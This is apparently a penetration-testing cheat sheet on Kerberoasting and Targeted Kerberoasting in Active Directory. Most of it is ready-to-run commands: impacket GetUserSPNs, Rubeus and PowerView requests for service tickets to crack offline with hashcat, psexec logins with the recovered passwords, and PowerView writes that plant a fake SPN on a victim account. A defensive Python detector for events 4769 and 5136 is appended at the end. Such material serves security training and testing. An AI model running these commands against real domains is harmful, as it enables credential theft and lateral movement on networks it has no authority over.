
# Kerberoasting

In the second phase of Kerberos, the client asks the KDC for a service ticket (TGS) for a given Service Principal Name (SPN) in order to access a resource. The KDC performs no authorization check at this point: permissions are enforced by the service itself when it receives the ticket. Any authenticated domain user can therefore request a TGS for any SPN, and because part of the ticket is encrypted with a key derived from the service account's password, the attacker can take it offline and crack it to recover that password.

***NOTE**: If the SPN runs in the context of a computer account, a managed service account or a group-managed service account, the password is randomly generated, complex and 120 characters long, which makes it effectively impossible to crack. For this reason, **focus on SPNs that run in the context of user accounts**.*

## Attack

{% tabs %}
{% tab title="Remotely" %}
**Linux**

[impacket-GetUserSPNs](https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py) lists the user accounts that have an SPN set and, with `-request`, obtains a TGS for each of them.\
You must have the credentials of a domain user to perform the extraction.

Kerberos tolerates only a few minutes of clock skew, so first synchronize your clock with the domain controller using `ntpdate` or `rdate`.

{% code overflow="wrap" %}

```bash
sudo ntpdate <IP_DC>
```

{% endcode %}

List the accounts that have an SPN

{% code overflow="wrap" %}

```bash
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>
```

{% endcode %}

Request a TGS for every account with an SPN

{% code overflow="wrap" %}

```bash
GetUserSPNs.py -request -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]
```

{% endcode %}

Get TGS ticket for a specific account

{% code overflow="wrap" %}

```bash
GetUserSPNs.py -request-user <NAME> -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]
```

{% endcode %}

Crack the output offline with hashcat (`-m 13100`).
{% endtab %}

{% tab title="Locally" %}
**Windows**

Since we are already on a Windows system joined to the domain, the tools run in the context of the current logon session and we do not need to supply a username and password.

We can use [Rubeus](https://github.com/GhostPack/Rubeus) to enumerate the Kerberoastable accounts and request their TGS. `/stats` only summarizes those accounts without requesting any ticket:

```powershell
.\Rubeus.exe kerberoast /stats
```

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe kerberoast /outfile:<OutputFile> [/user:<NAME_TARGET>] [/tgtdeleg]
```

{% endcode %}

*On domain controllers up to Windows Server 2016, `/tgtdeleg` lets you request the ticket with RC4 encryption, which is much easier to crack.*

Or with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser -Identity <NAME_TARGET> | Get-DomainSPNTicket -Format Hashcat
```

{% endcode %}

Crack the file `<OutputFile>` offline with hashcat (e.g. `-m 13100`).
{% endtab %}
{% endtabs %}

Connect to a host with the recovered credentials, for example with impacket's `psexec.py`:

{% code overflow="wrap" %}

```bash
psexec.py <DOMAIN>/<USER>@<IP>
psexec.py <DOMAIN>/<USER>@<MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP>
```

{% endcode %}

## Targeted Kerberoasting

This abuse is possible when you control a principal that holds `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN` rights over the target account.\
The attacker can then add an SPN (`ServicePrincipalName`) to that account. Once the account has an SPN, its service tickets can be requested and cracked like those of any other Kerberoastable account. This technique is called **Targeted Kerberoasting**.

{% tabs %}
{% tab title="Remotely" %}
With [targetedKerberoast.py](https://github.com/ShutdownRepo/targetedKerberoast)

{% code overflow="wrap" %}

```bash
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-ip <IP>
```

{% endcode %}

With Kerberos authentication (`-k`), a TGT must already be in the credential cache (`KRB5CCNAME`); otherwise the tool fails with the error "*'NoneType' object has no attribute 'getCredential'*".

{% code overflow="wrap" %}

```bash
impacket-getTGT <DOMAIN>/<USER>:<PASS> -dc-ip <IP>
export KRB5CCNAME=./<USER>.ccache
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-host <HOSTNAME> -v -k
```

{% endcode %}

For some tools (e.g. evil-winrm), it may be necessary to configure `/etc/krb5.conf`.\
The minimum structure is as follows:

{% code overflow="wrap" %}

```ini
[libdefaults]
  default_realm = <DOMAIN.COM>

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }
```

{% endcode %}
{% endtab %}

{% tab title="Locally" %}
Build a credential object for the account you control (the one holding the write right over the target):

{% code overflow="wrap" %}

```powershell
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
```

{% endcode %}

**Creating a Fake SPN** with PowerView ([old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [new](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1))

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView.ps1
Set-DomainObject -Credential $Cred -Identity <TARGET> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
```

{% endcode %}

**Kerberoasting** with [Rubeus](https://github.com/GhostPack/Rubeus)

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe kerberoast /user:<TARGET> /nowrap
```

{% endcode %}

**Cleanup fake SPN** (`-Clear` removes every value of the attribute, so this is only safe if the target had no SPN before)

{% code overflow="wrap" %}

```powershell
Set-DomainObject -Credential $Cred -Identity <TARGET> -Clear serviceprincipalname -Verbose
```

{% endcode %}
{% endtab %}
{% endtabs %}
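Added example, not code from the original notes or from any of the tools above: the defender-side view of both sections, a small detection pass over constructed Windows Security events. `EVENTS`, the simplified field names and the `WINDOW` / `MIN_DISTINCT_SPNS` thresholds are assumptions; the first rule flags a client that pulls RC4 (etype 0x17) service tickets for several user-account SPNs in a short window (the Kerberoasting described at the top of the page, skipping machine accounts as the note explains), the second flags a `servicePrincipalName` write on a user object, which is the setup step of Targeted Kerberoasting.

```python
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample events (invented values, simplified field names): Windows Security
# event 4769 (Kerberos service ticket requested) and 5136 (directory object modified).
EVENTS = [
    {"id": 4769, "time": "2024-05-01T10:00:01", "account": "jdoe@CORP.LOCAL",
     "client": "10.0.0.15", "service": "svc_sql", "etype": 0x17},
    {"id": 4769, "time": "2024-05-01T10:00:02", "account": "jdoe@CORP.LOCAL",
     "client": "10.0.0.15", "service": "svc_backup", "etype": 0x17},
    {"id": 4769, "time": "2024-05-01T10:00:02", "account": "jdoe@CORP.LOCAL",
     "client": "10.0.0.15", "service": "svc_web", "etype": 0x17},
    {"id": 4769, "time": "2024-05-01T10:00:03", "account": "jdoe@CORP.LOCAL",
     "client": "10.0.0.15", "service": "FS01$", "etype": 0x17},  # machine account: ignored
    {"id": 4769, "time": "2024-05-01T10:05:00", "account": "asmith@CORP.LOCAL",
     "client": "10.0.0.22", "service": "svc_sql", "etype": 0x12},  # AES ticket: normal use
    {"id": 5136, "time": "2024-05-01T10:30:00", "account": "jdoe@CORP.LOCAL",
     "object": "CN=svc_legacy,OU=Users,DC=corp,DC=local", "class": "user",
     "attribute": "servicePrincipalName", "value": "notahacker/LEGIT"},
]

RC4_HMAC = 0x17                 # TicketEncryptionType 0x17 = RC4-HMAC (hashcat -m 13100)
WINDOW = timedelta(minutes=5)   # assumed tuning values, not from the original page
MIN_DISTINCT_SPNS = 3

def is_user_service(name):
    # Computer accounts ($) and krbtgt have long random passwords: not crackable targets.
    return not name.endswith("$") and name.lower() != "krbtgt"

def detect_kerberoast(events):
    """(account, client, spns) when one client pulls RC4 tickets for many user SPNs."""
    seen = defaultdict(list)  # (account, client) -> [(time, service)]
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC and is_user_service(e["service"]):
            seen[(e["account"], e["client"])].append((datetime.fromisoformat(e["time"]), e["service"]))
    alerts = []
    for (acct, client), reqs in seen.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window starting at each request
            spns = {s for t, s in reqs[i:] if t - t0 <= WINDOW}
            if len(spns) >= MIN_DISTINCT_SPNS:
                alerts.append((acct, client, sorted(spns)))
                break
    return alerts

def detect_spn_write(events):
    """(actor, object) for every servicePrincipalName write on a user object (5136)."""
    return [(e["account"], e["object"]) for e in events
            if e["id"] == 5136 and e["class"] == "user"
            and e["attribute"].lower() == "serviceprincipalname"]
```

In a real deployment the same two rules would be fed from the domain controllers' Security log (4769 with its TicketEncryptionType field, and 5136 with directory service change auditing enabled on user objects).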
